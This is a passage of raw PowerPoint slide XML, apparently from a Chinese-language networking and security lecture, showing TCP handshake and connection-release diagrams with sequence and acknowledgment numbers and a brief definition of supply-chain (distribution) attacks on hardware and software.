                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1000</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(SYN=1)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2779"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27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27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Box 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2189163" y="2492375"/>
            <a:ext cx="4397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SEQ=ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="1D00C8"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2000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000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=1001 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(SYN=1,  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2784" name="TextBox 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2627313" y="3140075"/>
            <a:ext cx="298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SEQ=1000  ACK=2001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100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32772"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32772"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3277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2771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3277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2782"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32782"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32782"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32782"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="32780"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32780"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32780"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32780"/>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2779"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32779"/>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2781"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="327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773"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3277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2778"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="327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2783"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3278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2774"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3277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2784"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="327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2775"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32775"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="59" fill="hold">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32776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="64" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="65" presetID="17" presetClass="entr" presetSubtype="10" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="32777"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32777"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="327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p:bldP spid="32772" grpId="0" animBg="1"/>
      <p:bldP spid="32773" grpId="0" animBg="1"/>
      <p:bldP spid="32774" grpId="0" animBg="1"/>
      <p:bldP spid="32775" grpId="0" animBg="1"/>
      <p:bldP spid="32776" grpId="0" animBg="1"/>
      <p:bldP spid="32777" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="32778" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="32779" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="32781" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="32783" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="32784"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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>又称为分发攻击，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在软硬件的生产工厂内或在产品分发过程中恶意修改硬件或软件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340994" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>软硬件配置攻击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70A1C510-8A8E-4703-9A1D-14B2E66D28E5}"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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>TCP连接的释放</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795"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3796"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33797" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2189163" y="2276475"/>
            <a:ext cx="4535487" cy="431800"/>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3798" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2195513" y="2997200"/>
            <a:ext cx="4537075" cy="504825"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33799" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2189163" y="4292600"/>
            <a:ext cx="4535487" cy="504825"/>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3800" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2195513" y="1987550"/>
            <a:ext cx="4537075" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:bevel/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33801" name="TextBox 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3419475" y="161925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itchFamily="49" charset="-122"/>
                <a:sym typeface="黑体"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3802" name="TextBox 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3844925" y="2112963"/>
            <a:ext cx="1881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C00000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>000</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3803"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380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38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TextBox 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3348038" y="2833688"/>
            <a:ext cx="2981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3808" name="TextBox 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3419475" y="4149725"/>
            <a:ext cx="298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SEQ=6001  ACK=8001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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33809" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2195513" y="5227638"/>
            <a:ext cx="4537075" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:bevel/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33810" name="TextBox 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3736975" y="485775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连接被释放</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33811" name="Straight Arrow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2195513" y="3573463"/>
            <a:ext cx="4537075" cy="503237"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="33812" name="TextBox 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3419475" y="3409950"/>
            <a:ext cx="289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ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33796"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33796"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3379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3795"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
